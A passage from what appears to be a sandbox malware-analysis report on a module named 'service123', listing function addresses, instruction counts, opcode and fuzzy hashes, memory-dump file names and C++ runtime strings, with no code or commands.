Instruction Fuzzy Hash: D4D17E75A0425D8FCB01DF6AC4C06CDBBF1BF49324F684255E865ABB91D335E981CBA0

Function 6C269B60 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

, xrefs: 6C269BF8

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5fa84fb4acbd506ee1621b354f7e87afc73ec41885f5411e690aae8340cc5d7f
Instruction ID: 8ab5e51ff024a0098b775bdc8ce5fbfebacc286358b94ecc339b6852db8fc86a
Opcode Fuzzy Hash: 5fa84fb4acbd506ee1621b354f7e87afc73ec41885f5411e690aae8340cc5d7f
Instruction Fuzzy Hash: 97213371A143088FC714EF35C98499BB7F5AB89208F15992DEC8487705DB35D88DCB92

Function 6C22EB10 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C22EB50

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: __gnu_cxx::__concurrence_lock_error
API String ID: 0-1226115927
Opcode ID: 74516dbbd6eb1e71f8b2880ddfeb7352e3132832aac4da23cf0086d57000b4cb
Instruction ID: 4ec890daaa0edccb6a0020a2b4ea58d1d51b11c35046d857733c6deff22267ce
Opcode Fuzzy Hash: 74516dbbd6eb1e71f8b2880ddfeb7352e3132832aac4da23cf0086d57000b4cb
Instruction Fuzzy Hash: 7BE048B5D04245CFC708EF34C58546BB7F16BD9200F449A1DDC4153B48D634D14CCB96

Function 6C230260 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 6C230280

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
API String ID: 0-3720052664
Opcode ID: da7985d6fded4194928f98f0a5b87a878c9a7594c257daae1243934ef35c032c
Instruction ID: db1cfeb509191f1ad2c3710bc937aad37ea1690e7754fc7d1855b7363e916dbd
Opcode Fuzzy Hash: da7985d6fded4194928f98f0a5b87a878c9a7594c257daae1243934ef35c032c
Instruction Fuzzy Hash: C4E0B6B5E496448BCB04DF18C58581AF7F1AF9A704F65AA9DD84897720D231E510CA1B

Function 6C25DBEE Relevance: .8, Instructions: 838COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca053e17dd9628f3e39c28b2c86eafe9632d5f0386b7fb7cc34a7ad9c7eb8845
Instruction ID: dda07546174762aa191e81c1edb45525ce7c7bed720ebac8f6e7d63fdc8b6479
Opcode Fuzzy Hash: ca053e17dd9628f3e39c28b2c86eafe9632d5f0386b7fb7cc34a7ad9c7eb8845
Instruction Fuzzy Hash: CE72DE74A0425DDFDB00CF68C580B9EBBB1AF06308FA88559EC54AFB91D778D895CB81

Function 6C261510 Relevance: .7, Instructions: 684COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4be96cf53fa2c04f6f4e92de0dcde9735cf39c08b5d798c2f6d60465fa9c9ca
Instruction ID: 534d083b53992e76cfeb5b23c8552f310b50c72bee1ce11b7cce1f6b9c536ca0
Opcode Fuzzy Hash: f4be96cf53fa2c04f6f4e92de0dcde9735cf39c08b5d798c2f6d60465fa9c9ca
Instruction Fuzzy Hash: D452CE74A0525ECBDB01CF7AC08479DBBB1AF06309F148259EC55ABE91D334E9C5CBA1

Function 6C260060 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc759f310b56080c1a47d367f13f1ea995e737fab372b2057ae6274933c65484
Instruction ID: 46fb5bcbda512849162c25fb207e2a97f340208b806169c2f0ba16cbebe1a2e0
Opcode Fuzzy Hash: fc759f310b56080c1a47d367f13f1ea995e737fab372b2057ae6274933c65484
Instruction Fuzzy Hash: DE52DD74A0528ECFDB00CF6AC08479DBBB1AF06308F148259EC55ABE91D37498C5DBA9

Function 6C260AC0 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afc9f4ec5732af9b7727a2d03c43e262a924d4f39375862958c25b3951172626
Instruction ID: 23873f16c4fe73a4584467b5665af5778324223d43cfa676f1581e0b9bfb88ca
Opcode Fuzzy Hash: afc9f4ec5732af9b7727a2d03c43e262a924d4f39375862958c25b3951172626
Instruction Fuzzy Hash: 2E52D174A0529ECFDB00CF6AC08479DBBB1AF06308F148249EC54ABE91D375E9C5DBA5

Function 6C25F610 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac1aa334f3c384556423ff58dc23de2502f96f2e891072a51c1aefa3e13b156
Instruction ID: dfbdb1983079f40d4d8b5c662fa10aa54a7125f1dc93acd38526d6bd0b0d59e9
Opcode Fuzzy Hash: dac1aa334f3c384556423ff58dc23de2502f96f2e891072a51c1aefa3e13b156
Instruction Fuzzy Hash: 6542CD74A0524ECFDB01CF68C08479FBBB1AF0A319F948259FC54ABA91D335D896CB91

Function 6C234453 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a65d2b086828e8573915e130348d145bdd2ded75eaa0a073e623c33f909c24
Instruction ID: f96874cd4b300d366f2415f99260c0910ef64fc0f232ff460116415da48c4a19
Opcode Fuzzy Hash: 98a65d2b086828e8573915e130348d145bdd2ded75eaa0a073e623c33f909c24
Instruction Fuzzy Hash: 49A10A72E08189DF8710EE3CCA4455A7BF4A76B224F88DA99EC5CC7704F63AD4148F66

Function 6C213000 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c637328f1c3f9a99626241dfbc6a56f79207990152ab584c86d5ca6133bf123d
Instruction ID: f490374fdb80786eadf5677afb657197f7060595d3525a51d9450e0d2bd7c310
Opcode Fuzzy Hash: c637328f1c3f9a99626241dfbc6a56f79207990152ab584c86d5ca6133bf123d
Instruction Fuzzy Hash: A0E1DBB060C61A8FD714CF19C0A0766BBE3BF45319F0981A9EE594FE46C779E949CB80

Function 6C2D50D0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816e96a6a57d3c6ecd6fab72ae8d05573b2397dfd8734aa6a60c99c444536d08
Instruction ID: b0b253361388944f897d614de2bf17160567218695ce7dbe58db9fa0ced20d4b
Opcode Fuzzy Hash: 816e96a6a57d3c6ecd6fab72ae8d05573b2397dfd8734aa6a60c99c444536d08
Instruction Fuzzy Hash: 5B712E76A08684DFC700EF39C58445BB7F6BBDA214F58CA59EC8847708E639E5098F93

Function 6C28AF70 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37daa8aa3e118f4e8720d3c74f371b06dee1d69ba6c223d9df9bc124999f4064
Instruction ID: 7d5adb215f6a43b8d92eaedfa633acb8f3f26176375022289ca268f28f1c9a0b
Opcode Fuzzy Hash: 37daa8aa3e118f4e8720d3c74f371b06dee1d69ba6c223d9df9bc124999f4064
Instruction Fuzzy Hash: D9516C72A09249DFC700EF3DC94054BB7F5AB8A314F54CA59EC4C87749E63AD4098FA6

Function 6C2A7350 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6df8702cbb6ce8bb6d9f98d6e999a65867fabce1e76c442d61c2ca09cd893b6
Instruction ID: e7b998e3e359b7baed35812c66d05f6709c69db9d7191a360baec8cb951e4348
Opcode Fuzzy Hash: d6df8702cbb6ce8bb6d9f98d6e999a65867fabce1e76c442d61c2ca09cd893b6
Instruction Fuzzy Hash: 145105B5A09744DFCB14EF79C58489ABBF4BB5E204F419968EC88C7704E734E8498F62

Function 6C28C1A0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571ec22dae319b10349da2f613a1510a232b1ac1525812d608851b6bd8488bdc
Instruction ID: 53d02186590c21af88d2d7e57e4216c529853f0b54c7cc242a38352832378379
Opcode Fuzzy Hash: 571ec22dae319b10349da2f613a1510a232b1ac1525812d608851b6bd8488bdc
Instruction Fuzzy Hash: 62417C72A09245DFC300EF7DC980946B7F5AB9A318F48CA59EC4C87749E73AD4098F62

Function 6C24BBD7 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f87fcac826d75783ab325281c2672bb988ec97542112ba2109433fce5d4364a7
Instruction ID: 93355b535956ab01546785790ef3c7c48d14612d19a146c25d91231b961244c0
Opcode Fuzzy Hash: f87fcac826d75783ab325281c2672bb988ec97542112ba2109433fce5d4364a7
Instruction Fuzzy Hash: 8E41DFB090435D8FEB04DFA9C484BDDBBF0BF09308F158468D894AB751E774A948CB91

Function 6C289600 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f51a4766909be9033aa8a1262377a434c037dbcb340ba70425641ea87936528c
Instruction ID: f42a4d06d0e9465ee579d2d5a07c59f62579a852d9e7b9e4d045729f78b9273e
Opcode Fuzzy Hash: f51a4766909be9033aa8a1262377a434c037dbcb340ba70425641ea87936528c
Instruction Fuzzy Hash: E2317C7570A20A8F8700DF29D58490BFBF1BBC6329F10C569ED5887754D732D81ACB91

Function 6C23D2A0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dabd901a07b26272ade06e7ece3e26ef17044756cf84b7e5397192060dbc3f9
Instruction ID: 5c81dd8378e8abdd1265f39004fa384947b337e1b151f4d7f64352f15ea488a7
Opcode Fuzzy Hash: 6dabd901a07b26272ade06e7ece3e26ef17044756cf84b7e5397192060dbc3f9
Instruction Fuzzy Hash: EA2151B1A043158FC700EF79D58049BF7F5BBD5648F54992DEC4897704EB35D8098BA2

Function 6C287D10 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffaa68d943a571cc8b4dad2b53196e8a195e75a2d35091dee531c520c5c37739
Instruction ID: 7ba7154946e4c8b756bbeda6c6a124af03421540b703f098abccea0c59a38545
Opcode Fuzzy Hash: ffaa68d943a571cc8b4dad2b53196e8a195e75a2d35091dee531c520c5c37739
Instruction Fuzzy Hash: 79113D76A09244DFC714EF79C98489BBBF9AB8A214F05D92DF849C7704E734D4088FA6

Function 6C24BBDB Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9235d52846ac9c54502eae53c7a88feb6995ce71b07a48c307aa20f5718e803
Instruction ID: a85de4cfa8f16146be3487df23028205c70a4e33b8ca7993810347262786912a
Opcode Fuzzy Hash: e9235d52846ac9c54502eae53c7a88feb6995ce71b07a48c307aa20f5718e803
Instruction Fuzzy Hash: 7531C1B090435D8FEB14DFA9C488BDDBBF4AF0A308F158458D854AB791D774A948CF91

Function 6C28AEC0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be638dc99abd518093b38b05d78c1900bd4663a94852fbc597da82d780393b11
Instruction ID: 23a9b946dce90a4f52da3c42dddb129af307b7a9693781fc028f0b48cdeb68c7
Opcode Fuzzy Hash: be638dc99abd518093b38b05d78c1900bd4663a94852fbc597da82d780393b11
Instruction Fuzzy Hash: E4014472A09148DF8700EE7CC940447B7F5BB9A318F14DA59EC4C87B89E639D4088F66

Function 6C28BD10 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78df75d98cd62336eb1cf3dae4202c5e2327e2aacc6cf88d79dc14641e71293a
Instruction ID: aaa6385cabdb3def466cf5b594a7c9316b0cb6be23f0699a56835c5ec54f17d2
Opcode Fuzzy Hash: 78df75d98cd62336eb1cf3dae4202c5e2327e2aacc6cf88d79dc14641e71293a
Instruction Fuzzy Hash: 00012132A09148DF8700EE7CCD4488AB7F5AB8A318F44D65DEC4C97759D635D4048B66

Function 6C28B4D0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

